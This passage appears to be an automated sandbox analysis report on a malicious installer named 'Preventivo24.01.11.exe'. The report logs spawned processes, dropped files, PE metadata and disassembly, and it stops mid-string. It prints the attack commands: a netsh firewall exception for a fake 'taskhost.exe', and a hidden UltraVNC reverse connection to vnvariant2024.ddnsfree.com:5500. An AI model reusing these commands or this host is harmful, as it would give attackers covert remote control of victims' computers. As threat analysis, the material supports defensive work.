Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>NulJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdfJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.iniJump to behavior
Source: C:\Games\taskhost.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLL
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Preventivo24.01.11.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Preventivo24.01.11.exeStatic file information: File size 5955744 > 1048576
Source: Preventivo24.01.11.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Preventivo24.01.11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: shi6E82.tmp.0.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_00FC0CA0
Source: Preventivo24.01.11.exeStatic PE information: section name: .didat
Source: ddengine.dll.0.drStatic PE information: section name: .SharedD
Source: shi6E82.tmp.0.drStatic PE information: section name: .wpp_sf
Source: shi6E82.tmp.0.drStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009F6820 pushfd ; iretd 0_3_009F6825
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009F6064 push esp; retf 0_3_009F6069
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009A8900 push ebp; ret 0_3_009A8901
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009AA5B8 push eax; ret 0_3_009AA5BA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009A8DA4 push ecx; ret 0_3_009A8DB1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_00968443 push ds; retf 0_3_00968444
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_00963A48 push ecx; ret 0_3_00963A49
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009683CF push ds; retf 0_3_009683D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009705F3 push 00000078h; retf 0_3_009705F5
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F9A4B0 push ecx; mov dword ptr [esp], 3F800000h0_2_00F9A60F
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108B2DE push ecx; ret 0_2_0108B2F1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9D5CA push esi; ret 0_2_00E9D5CC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9FB10 push ecx; mov dword ptr [esp], ecx0_2_00E9FB11
Source: C:\Games\viewer.exeCode function: 6_2_006350CC push ecx; ret 6_2_006350DF
Source: C:\Games\viewer.exeCode function: 6_2_00635676 push ecx; ret 6_2_00635689
Source: C:\Games\taskhost.exeCode function: 41_2_001E6143 push ecx; ret 41_2_001E6156
Source: C:\Games\taskhost.exeCode function: 41_2_000A51FF pushad ; iretd 41_2_000A5218
Source: C:\Games\taskhost.exeCode function: 41_2_000AE25B pushad ; iretd 41_2_000AE25C
Source: C:\Games\taskhost.exeCode function: 41_2_000AE263 pushad ; iretd 41_2_000AE264
Source: C:\Games\taskhost.exeCode function: 41_2_000A5265 push 60F5C5F1h; iretd 41_2_000A5278
Source: C:\Games\taskhost.exeCode function: 41_2_000AE27D pushad ; iretd 41_2_000AE27E
Source: C:\Games\taskhost.exeCode function: 41_2_000AE275 pushad ; iretd 41_2_000AE276
Source: C:\Games\taskhost.exeCode function: 41_2_000AC5A6 pushad ; iretd 41_2_000AC5A9
Source: C:\Games\taskhost.exeCode function: 41_2_000AE5FB pushad ; iretd 41_2_000AE5FC
Source: C:\Games\taskhost.exeCode function: 41_2_000AE603 pushad ; iretd 41_2_000AE604
Source: C:\Games\taskhost.exeCode function: 41_2_000AE61D pushad ; iretd 41_2_000AE61E
Source: C:\Games\taskhost.exeCode function: 41_2_000AE615 pushad ; iretd 41_2_000AE616
Source: C:\Games\taskhost.exeCode function: 41_2_000ADEBB pushad ; iretd 41_2_000ADEBC
Source: C:\Games\taskhost.exeCode function: 41_2_000ADEC3 pushad ; iretd 41_2_000ADEC4
Source: C:\Games\taskhost.exeCode function: 41_2_000ADEDD pushad ; iretd 41_2_000ADEDE
Source: C:\Games\taskhost.exeCode function: 41_2_000ADED5 pushad ; iretd 41_2_000ADED6

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6FDC.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exeJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exeJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\shi6E82.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6F00.tmpJump to dropped file
Source: taskhost.exe.0.drBinary or memory string: bcdedit.exe
Source: taskhost.exe.0.drBinary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: C:\Games\taskhost.exeCode function: 41_2_000CAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,41_2_000CAEE0
Source: C:\Games\taskhost.exeCode function: 41_2_000C7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateP